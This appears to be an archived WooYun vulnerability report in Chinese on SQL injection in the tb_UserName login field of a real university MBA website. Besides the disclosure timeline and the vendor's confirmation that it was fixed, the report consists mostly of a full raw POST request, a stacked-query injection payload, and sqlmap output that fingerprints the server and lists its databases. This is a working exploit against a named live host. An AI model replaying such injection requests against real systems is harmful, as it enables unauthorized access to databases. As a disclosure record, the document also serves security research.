乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-11-30: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
POST /YJSProj/login.aspx HTTP/1.1Content-Length: 317Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://mba.upc.edu.cnHost: mba.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Button2=&ddl_UserType=%e5%ad%a6%e7%94%9f&tb_PWD=1&tb_UserName=*&__EVENTVALIDATION=/wEWCwL5zISeAwLxz5rXDwLWxoPwBQK7q7GGCALn78X/CwLN4YDXCgKj4KSPBwL55LqgBAKrgLa1BwLW2YKoCQKM54rGBpW9jKywzCwxG3hQoJbf53IMuvE6&__VIEWSTATE=/wEPDwUKLTczNzM3MDA5OWRknWeh5EvxKcFyYGRpZD%2b1JqgkKoc%3d
tb_UserName参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: Button2=&ddl_UserType=%e5%ad%a6%e7%94%9f&tb_PWD=1&tb_UserName=');IF(7928=7928) SELECT 7928 ELSE DROP FUNCTION SKCK--&__EVENTVALIDATION=/wEWCwL5zISeAwLxz5rXDwLWxoPwBQK7q7GGCALn78X/CwLN4YDXCgKj4KSPBwL55LqgBAKrgLa1BwLW2YKoCQKM54rGBpW9jKywzCwxG3hQoJbf53IMuvE6&__VIEWSTATE=/wEPDwUKLTczNzM3MDA5OWRknWeh5EvxKcFyYGRpZD+1JqgkKoc=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [7]:[*] master[*] model[*] msdb[*] msdb1[*] tempdb[*] WebSiteDB[*] YJSDB
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 13:36
感谢您对学校的网络安全的关注,我们会尽快解决该问题。
2015-11-30:已经修复完毕,谢谢!